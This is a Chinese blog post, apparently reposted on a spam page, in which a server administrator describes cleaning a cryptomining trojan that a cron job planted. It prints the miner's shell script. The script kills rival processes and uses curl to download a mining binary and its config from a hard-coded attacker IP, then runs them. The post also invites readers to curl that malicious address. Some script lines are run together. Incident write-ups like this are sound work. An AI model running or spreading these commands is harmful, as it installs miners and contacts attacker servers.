完美世界官网,《完美世界》txt全集

記一次服務(wù)器被植入挖礦木馬cpu飆升200%解決過程

來源：我叫劉半仙發(fā)布時間：2018-09-18 16:01:36 閱讀量：1279

線上服務(wù)器用的是某訊云的，歡快的完美運行著Tomcat，MySQL，MongoDB，ActiveMQ等程序。突然一則噩耗從前線傳來：網(wǎng)站不能訪問了。

此項目是我負(fù)責(zé)，我以150+的手速立即打開了服務(wù)器，看到Tomcat掛了，然后順其自然的重啟，啟動過程中直接被killed，再試試數(shù)據(jù)庫，同樣沒成功，多次嘗試甚至重啟機器無果。機制的我打了個top，出現(xiàn)以下內(nèi)容：

這是誰運行的程序？不管三七二十一先殺掉再說，因為它就是Tomcat等程序啟動不了的元兇。然而并沒有什么卵用，過一會再看那個東西又跑出來占cpu。懷疑是個定時任務(wù)：

什么鬼，是個圖片？立即訪問了一下：

好尷尬，但是心思細(xì)膩的我早知道沒這么簡單，肯定只是偽裝，crul過去是下面的腳本，過程就是在挖礦：

#!/bin/shpkill -9 142.4.124.164
pkill -9 192.99.56.117
pkill -9 jva
pkill -f ./atd
pkill -f /tmp/wa/httpd.conf
pkill -f 108.61.186.224
pkill -f 128.199.86.57
pkill -f 67.231.243.10
pkill -f 142.4.124.164
pkill -f 192.99.56.117
pkill -f 45.76.102.45
pkill -f AnXqV.yam
pkill -f BI5zj
pkill -f Carbon
pkill -f Duck.sh
pkill -f Guard.sh
...中間省略
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./suppoie -c config.json -t `echo $cores` >/dev/null &fips -fe|grep -w suppoie |grep -v grepif [ $? -eq 0 ]thenpwdelsecurl -o /var/tmp/config.json http://192.99.142.235:8220/1.json
curl -o /var/tmp/suppoie http://192.99.142.235:8220/rig1
chmod 777 /var/tmp/suppoiecd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./suppoie -c config.json -t `echo $cores` >/dev/null &
sleep 3fiif [ $? -eq 0 ]thenpwdelsecurl -o /var/tmp/config.json http://192.99.142.235:8220/1.json
curl -o /var/tmp/suppoie http://192.99.142.235:8220/rig2
chmod 777 /var/tmp/suppoiecd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./suppoie -c config.json -t `echo $cores` >/dev/null &fiecho "runing....."

有興趣的同學(xué)想查看以上完整源代碼，命令行運行下面指令（不分操作系統(tǒng)，方便安全無污染）：

curl 192.99.142.235:8220/logo3.jpg

既然知道它是個定時任務(wù)，那就先取消了它，并且看看它是誰在運行：